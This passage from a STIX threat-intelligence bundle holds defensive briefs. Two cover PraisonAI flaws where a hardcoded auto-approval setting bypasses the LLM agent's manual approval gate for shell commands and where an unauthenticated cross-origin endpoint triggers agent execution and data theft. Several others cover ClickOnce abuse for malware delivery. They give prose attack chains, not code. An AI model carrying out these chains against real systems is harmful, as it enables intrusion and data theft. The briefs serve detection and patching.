      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ec68ca25-8e9b-56fb-94a5-c1809acb855d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0e022061-f866-5d1a-b27b-ebf2ccc57dfe",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8870dfd5-7803-59a3-b10c-06289d9a2db5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0e022061-f866-5d1a-b27b-ebf2ccc57dfe",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0e022061-f866-5d1a-b27b-ebf2ccc57dfe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-56075: PraisonAI Arbitrary Shell Command Execution via Hardcoded Approval Mode Override",
      "description": "## Overview\n\nPraisonAI versions before 4.5.128 are vulnerable to an arbitrary shell command execution (RCE) flaw, tracked as CVE-2026-56075. This critical vulnerability stems from a design oversight where the UI modules hardcode the `approval_mode` setting to `auto`. This hardcoded value overrides any administrative configurations set via the `PRAISON_APPROVAL_MODE` environment variable, effectively bypassing a crucial manual approval gate. Authenticated attackers can leverage this bypass to instruct the LLM agent to execute arbitrary shell commands. The exploitation occurs through the `subprocess.run` function being called with `shell=True` and insufficient command sanitization, allowing attackers to inject and run OS commands directly on the host system. This presents a severe risk of full system compromise for organizations utilizing affected PraisonAI instances.\n\n## Attack Chain\n\n1.  **Initial Access**: An authenticated attacker gains legitimate access to the PraisonAI user interface.\n2.  **Malicious Input Submission**: The attacker crafts and submits specially designed input containing shell metacharacters and arbitrary commands to the PraisonAI LLM agent endpoint.\n3.  **Approval Bypass**: Due to the vulnerability, PraisonAI's UI modules hardcode `approval_mode` to `auto`, overriding the configured `PRAISON_APPROVAL_MODE` environment variable, thus bypassing any required manual approval for LLM agent actions.\n4.  **Insufficient Sanitization**: The PraisonAI application processes the attacker's input without adequately sanitizing shell metacharacters or blocking malicious commands.\n5.  **Command Execution via Subprocess**: The LLM agent, as part of its processing, invokes the `subprocess.run` Python function with the unsanitized malicious input and the dangerous `shell=True` parameter.\n6.  **Arbitrary Shell Command Execution**: The underlying operating system executes the attacker's arbitrary shell commands with the privileges of the PraisonAI application process.\n7.  **Post-Exploitation Activities**: The attacker now has remote code execution capabilities and can proceed with further actions such as data exfiltration, establishing persistence, privilege escalation, or deploying additional malware.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-56075 grants authenticated attackers arbitrary shell command execution on the host system running PraisonAI. This leads to a complete compromise of the affected server, enabling unauthorized access to sensitive data, full control over the application's functionality, and potential lateral movement within the compromised network. Organizations relying on PraisonAI for critical functions could face severe data breaches, service disruptions, intellectual property theft, or ransomware deployment. While specific victim counts are not yet available, the high severity of RCE vulnerabilities implies a significant risk for any organization using vulnerable versions.\n\n## Recommendation\n\n*   **Patch CVE-2026-56075**: Immediately upgrade PraisonAI to version 4.5.128 or later to address CVE-2026-56075.\n*   **Monitor Web Server Logs**: Deploy the provided Sigma rule \"Detects CVE-2026-56075 Exploitation - Command Injection via Web Interface\" to your SIEM to detect suspicious web requests containing shell metacharacters that may indicate exploitation attempts. Ensure `webserver` logs are ingested.\n*   **Monitor Process Creation**: Deploy the provided Sigma rule \"Detects CVE-2026-56075 Exploitation - Suspicious Shell Process from PraisonAI\" to your SIEM to identify unexpected shell processes originating from the PraisonAI application, signaling potential RCE. Ensure `process_creation` logs are enabled for Linux systems.\n*   **Review `subprocess.run` Usage**: Developers should review their code for any `subprocess.run` calls (or similar functions) that use `shell=True` with user-supplied input and implement robust input sanitization.\n",
      "published": "2026-06-18T23:26:52Z",
      "labels": [
        "rce",
        "llm",
        "webserver",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "indicator--7280f0f1-93c4-59fc-9d37-62b03bf5141f",
        "indicator--3d7d8539-1b5d-57e0-89fb-7162bb4812a8",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56075"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qwgj-rrpj-75xm"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/praisonai-arbitrary-shell-command-execution-via-hardcoded-approval-mode-override"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c35099f3-7ae4-5965-a4cc-faca16b40676",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1a0e400-b97d-5b46-9f45-ddfb69dc2f18",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1a2bc0fd-5fc8-5dfb-a216-332dd12b71ac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1a0e400-b97d-5b46-9f45-ddfb69dc2f18",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fc19ed8d-beee-528f-9baa-548395ae2c3b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1a0e400-b97d-5b46-9f45-ddfb69dc2f18",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d1a0e400-b97d-5b46-9f45-ddfb69dc2f18",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "PraisonAI Cross-Origin Agent Execution Vulnerability (CVE-2026-56076)",
      "description": "## Overview\n\nPraisonAI versions prior to 1.5.128 are susceptible to a critical cross-origin agent execution vulnerability, identified as CVE-2026-56076. This flaw resides in the `/agui` endpoint, which is intended for agent GUI interaction but critically lacks proper authentication. The endpoint also misconfigures CORS by sending `Access-Control-Allow-Origin: *` headers for all responses. Combined with the Starlette framework's flexible `Content-Type`-agnostic JSON parsing, this allows remote, unauthenticated attackers to bypass standard Same-Origin Policy (SOP) protections. Attackers can leverage this to trigger arbitrary agent execution on the PraisonAI server and subsequently exfiltrate sensitive data, including agent responses, results from tool execution, and environment configuration details. The vulnerability carries a CVSS v3.1 base score of 8.1, underscoring its high severity and potential for significant impact.\n\n## Attack Chain\n\n1.  An attacker identifies a PraisonAI instance running a vulnerable version (prior to 1.5.128).\n2.  The attacker crafts a malicious cross-origin POST request targeting the unauthenticated `/agui` endpoint.\n3.  The PraisonAI server's misconfigured `Access-Control-Allow-Origin: *` header allows the attacker's browser to bypass CORS preflight checks for simple requests.\n4.  The attacker sends a crafted JSON payload, leveraging Starlette's `Content-Type`-agnostic parsing, to the `/agui` endpoint.\n5.  The PraisonAI application processes the malicious payload, leading to arbitrary agent execution on the server.\n6.  The compromised agent executes attacker-supplied commands, potentially including data collection activities.\n7.  Sensitive data, such as agent responses, tool execution outputs, and environment variables, are exfiltrated back to the attacker's controlled domain via subsequent cross-origin requests or by embedding it in command outputs.\n8.  The attacker achieves full control over the agent and access to sensitive information, potentially leading to further system compromise.\n\n## Impact\n\nThe successful exploitation of CVE-2026-56076 grants remote, unauthenticated attackers the ability to execute arbitrary code within the PraisonAI agent's context. This directly leads to the compromise of the PraisonAI instance, allowing for sensitive data exfiltration, including intellectual property, system configurations, and operational data generated by the agent. Given the nature of AI agents, this could also involve access to or manipulation of critical business logic and data flows. Organizations using PraisonAI are at risk of data breaches, system integrity compromise, and potential service disruption if the vulnerability is not patched.\n\n## Recommendation\n\n*   Immediately upgrade PraisonAI instances to version 1.5.128 or newer to patch CVE-2026-56076.\n*   Deploy the Sigma rules in this brief to your SIEM to detect suspicious POST requests targeting the `/agui` endpoint with unusual `Content-Type` headers or malicious JSON payloads.\n*   Ensure web server logs (category `webserver`) are configured for full HTTP request and response logging to enable detection and forensic analysis related to CVE-2026-56076.\n",
      "published": "2026-06-18T23:28:07Z",
      "labels": [
        "web-vulnerability",
        "rce",
        "cors-bypass",
        "cross-origin",
        "agent-execution"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56076"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1044e1b6-33b5-5632-a75c-c70bfc52c398",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0cde2e78-75fb-53a2-a14d-9b880a2b2dba",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f5e92fa6-4eba-503c-acee-19fa29eba727",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0cde2e78-75fb-53a2-a14d-9b880a2b2dba",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d30ef390-704c-51a7-a52d-71095c23b230",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0cde2e78-75fb-53a2-a14d-9b880a2b2dba",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0cde2e78-75fb-53a2-a14d-9b880a2b2dba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of the ClickOnce Technology, Part 1",
      "description": "## Overview\n\nCrowdStrike researchers have identified a new vector for malware distribution leveraging Microsoft's ClickOnce technology. Published on June 18, 2026, this first part of a series details the internal workings of ClickOnce, a legitimate deployment solution designed for seamless application installation and automatic updates without requiring administrative privileges. While intended to simplify software distribution for developers and users, its user-friendly nature, including minimal user interaction for deployment and self-contained packaging, presents a compelling opportunity for threat actors to spread malicious applications. This enables attackers to deploy and potentially install malware on user endpoints by simply tricking a user into clicking a deployment link or button, thereby bypassing traditional installation barriers and facilitating persistent access.\n\n## Attack Chain\n\n1.  **Initial Access**: A user is lured (e.g., via phishing email or malicious advertisement) into navigating to a malicious website or opening a specially crafted document that hosts or links to a malicious ClickOnce deployment file.\n2.  **Deployment File Download**: Upon interaction (e.g., clicking an \"Install\" button), the malicious ClickOnce deployment file (typically with a `.application` extension) is downloaded to the user's system.\n3.  **User Execution**: The user clicks on the downloaded `.application` file, initiating the ClickOnce deployment process.\n4.  **ClickOnce Launcher Invocation**: The operating system's `rundll32.exe` program is launched, loading `dfshim.dll` (Deployment Shim) to handle the ClickOnce deployment and prompt the user for confirmation if the publisher's signature is not verified.\n5.  **Application Deployment**: The ClickOnce runtime processes the manifest and associated files, deploying the malicious application to a sandboxed location, typically within `%LOCALAPPDATA%\\Apps\\2.0\\`.\n6.  **Malicious Payload Execution**: The deployed ClickOnce application executes its embedded malicious payload, which can include various forms of malware such as ransomware, infostealers, or remote access tools, within the user's context.\n7.  **Persistence**: The malicious ClickOnce application leverages its inherent self-updating functionality to maintain persistence or establishes other persistence mechanisms (e.g., modifying registry run keys) for continued access.\n8.  **Impact**: The attacker achieves their objective, which may include data exfiltration, system compromise, or further network exploitation.\n\n## Impact\n\nIf this abuse of ClickOnce technology is successful, organizations face a significant risk of widespread malware infections, data breaches, and system compromise. The minimal user interaction and lack of administrative privilege requirements for deployment mean that even security-aware users could inadvertently execute malicious software. The self-updating nature of ClickOnce applications further allows for persistent access and easy modification of attacker payloads, making detection and eradication challenging. Without proper controls, this technique can lead to stealthy, persistent footholds within an organization's network, potentially affecting all Windows endpoints where ClickOnce is enabled.\n\n## Recommendation\n\n*   Enable detailed process creation logging (e.g., Sysmon Event ID 1) to capture executions of `dfsvc.exe` and `rundll32.exe` for analysis.\n*   Deploy the Sigma rules provided in this brief to your SIEM to detect suspicious ClickOnce application execution patterns.\n*   Review and enforce application control policies (e.g., AppLocker, WDAC) to restrict the execution of ClickOnce applications from untrusted internet zones or unsigned publishers, particularly those outside of sanctioned enterprise distribution points.\n",
      "published": "2026-06-19T04:48:05Z",
      "labels": [
        "windows",
        "malware",
        "deployment",
        "clickonce",
        "user-execution",
        "persistence"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2c12ebd3-d261-5b74-8fff-8bc22c5156be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c6850fd8-3095-53c4-9416-f95e37b5e9d8",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--819e209f-3557-58a5-bb36-d9ad1e57b8cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c6850fd8-3095-53c4-9416-f95e37b5e9d8",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c98aca99-f401-5e7a-8da6-2d02df568e72",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c6850fd8-3095-53c4-9416-f95e37b5e9d8",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c6850fd8-3095-53c4-9416-f95e37b5e9d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of ClickOnce Technology for Malware Distribution",
      "description": "## Overview\n\nThreat actors are increasingly exploiting Microsoft's ClickOnce technology, a legitimate application deployment framework, to facilitate the distribution and execution of malware. ClickOnce simplifies software distribution by allowing users to run, install, and automatically update applications with minimal interaction and often without requiring administrative privileges. While designed to streamline developer-to-user software delivery, this \"click-once\" convenience presents a significant security risk. Adversaries are weaponizing this technology by crafting malicious ClickOnce applications that, once deployed, can establish persistence and execute payloads. The abuse leverages ClickOnce's features such as self-contained packaging, automatic updates, and a simplified installation wizard that can bypass traditional security prompts if users are socially engineered. This trend highlights a shift towards abusing trusted, built-in system functionalities to bypass security controls and reach endpoints.\n\n## Attack Chain\n\n1.  **Attacker creates malicious ClickOnce application**: Attacker develops a malicious application (e.g., info-stealer, backdoor, ransomware) and packages it using ClickOnce technology, generating the required deployment manifests (`.application`, `.manifest`) and application files.\n2.  **Malicious hosting and delivery**: The attacker hosts the malicious ClickOnce deployment files on a compromised or attacker-controlled web server. They then distribute a link to the `.application` file via phishing emails, instant messages, or compromised websites, enticing victims to click.\n3.  **Initial Access / User Interaction**: A victim is lured into clicking the provided link, which triggers the download of the `.application` deployment manifest file to their local machine (e.g., Downloads folder).\n4.  **ClickOnce Deployment Service Invocation**: Upon user execution of the downloaded `.application` file (e.g., by double-clicking it), the Windows ClickOnce Deployment Support Service (`dfsvc.exe`) is automatically launched by the operating system.\n5.  **User Confirmation**: If the publisher's certificate for the malicious application is untrusted or invalid, the OS prompts the user with a security warning. The victim is socially engineered to bypass this warning and confirm the installation.\n6.  **Application File Download and Execution**: `dfsvc.exe` proceeds to download the malicious application files (e.g., `.exe`, `.dll`) from the attacker-controlled server into the user's ClickOnce application cache (`%LOCALAPPDATA%\\Apps\\2.0`). The application is then automatically executed.\n7.  **Persistence (Optional)**: If configured by the attacker (e.g., via the \"available offline\" option) and accepted by the user during the initial installation wizard, the malicious ClickOnce application may register itself for persistence, ensuring it runs upon system reboot or user login.\n8.  **Impact**: The malicious application (e.g., infostealer, backdoor, ransomware) executes with the user's privileges, achieving the attacker's objectives such as data exfiltration, remote control, or system encryption.\n\n## Impact\n\nThe abuse of ClickOnce technology allows threat actors to bypass traditional security measures and seamlessly deploy malware onto victim systems. If successful, this can lead to widespread infections, as the technology is designed for minimal user friction. The impact can range from data theft and system compromise (e.g., infostealers, remote access trojans) to full system encryption and extortion (e.g., ransomware). Organizations across all sectors are vulnerable, as the attack leverages a common Windows deployment mechanism, making it difficult for average users to differentiate between legitimate and malicious ClickOnce applications. The ease of deployment and potential for persistence make this a highly effective initial access and execution vector for adversaries.\n\n## Recommendation\n\n*   Enable comprehensive process creation logging (e.g., Sysmon Event ID 1) to capture executions of `dfsvc.exe` and processes running from the ClickOnce application cache.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment, paying close attention to `dfsvc.exe` invocations and processes originating from `AppData\\Local\\Apps\\2.0`.\n*   Implement application control policies (e.g., Windows Defender Application Control, AppLocker) to restrict execution of unsigned binaries or executables from non-standard locations, particularly user profile directories.\n*   Educate users about the risks of clicking on untrusted links or running `.application` files from unknown sources, emphasizing the importance of verifying publisher identities during ClickOnce installation prompts.\n",
      "published": "2026-06-21T07:04:41Z",
      "labels": [
        "clickonce",
        "malware",
        "application-deployment",
        "windows",
        "initial-access",
        "execution"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8950644c-e73a-5048-8d24-96955ae7fb22",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c44b9c40-c55c-5673-b7be-61858dac847d",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2b9f41ed-b3f3-557e-9e36-55769dff1941",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c44b9c40-c55c-5673-b7be-61858dac847d",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c44b9c40-c55c-5673-b7be-61858dac847d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Abuse of Microsoft ClickOnce Technology for Malware Delivery",
      "description": "## Overview\n\nCrowdStrike has highlighted the potential for abuse of Microsoft's ClickOnce technology, a deployment mechanism designed to simplify application distribution and installation on Windows systems. While ClickOnce offers developers an easy way to package and deliver software, requiring minimal user interaction and no administrative privileges, these very features can be weaponized by threat actors. This initial analysis focuses on the underlying mechanics of ClickOnce deployment, setting the stage for understanding how malicious actors could leverage it to bypass traditional security measures. The user-friendly \"click once\" installation process means that unsuspecting victims could inadvertently deploy malware, making it a powerful vehicle for initial access and execution. This vulnerability is significant for defenders as it represents a novel or under-documented method for adversaries to achieve their objectives without relying on more commonly detected techniques.\n\n## Attack Chain\n\n1.  **Preparation**: Attacker crafts a malicious application and publishes it using ClickOnce technology, generating a deployment file (e.g., a `.application` file).\n2.  **Delivery**: The attacker hosts the malicious ClickOnce deployment file on a controlled website or delivers it via a malicious link in a phishing email or message.\n3.  **User Execution**: A victim is lured into clicking the malicious link or opening the deployment file, which triggers its download and initiates the ClickOnce deployment process.\n4.  **Security Prompt**: The operating system displays a security warning or confirmation dialog to the user, particularly if the application publisher's signature is untrusted or unknown.\n5.  **Deployment Service Invocation**: Upon user confirmation, the Windows Deployment Foundation Services (`dfsvc.exe`) process is invoked to handle the download and installation/execution of the ClickOnce application.\n6.  **Application Cache Write**: The malicious ClickOnce application's files are downloaded and written to the user's ClickOnce application cache, typically located in `%LOCALAPPDATA%\\Apps\\2.0\\`.\n7.  **Malware Execution**: The malicious ClickOnce application is launched, executing its payload which could include installing additional malware, establishing persistence, or performing data exfiltration.\n\n## Impact\n\nIf successfully abused, the ClickOnce technology can lead to widespread malware infections, enabling attackers to establish a foothold on victim systems without requiring elevated privileges. Organizations could face data breaches, ransomware attacks, or system compromise as malicious applications bypass conventional security controls. The user-friendly nature of ClickOnce deployment lowers the barrier for successful social engineering, increasing the likelihood of successful attacks across various sectors. While specific victim counts are not available for this abuse method in this part of the research, the potential impact is broad, affecting any Windows environment where users might encounter and execute ClickOnce applications.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment, specifically focusing on `process_creation` and `network_connection` logs related to ClickOnce.\n*   Enable comprehensive `process_creation` logging to capture executions of `dfsvc.exe` and any processes launched from the ClickOnce application cache (`%LOCALAPPDATA%\\Apps\\2.0\\`).\n*   Monitor `network_connection` logs for outbound connections initiated by `dfsvc.exe` or other ClickOnce-related processes to suspicious or untrusted domains.\n*   Educate users about the risks of executing applications from untrusted sources, even those presented through what appears to be a legitimate Windows installation wizard, as this relates to the Attack Chain step of \"Security Prompt\".\n",
      "published": "2026-06-19T04:55:22Z",
      "labels": [
        "clickonce",
        "windows",
        "application-deployment",
        "abuse-t1204.002"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26c673b7-daf1-5ebd-9857-95afcfb2b39d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--66f7d3f0-c981-540b-8493-ab359d8d0c58",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91058bf8-f88d-5ce5-b4bc-8e3ef24f41a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--66f7d3f0-c981-540b-8493-ab359d8d0c58",
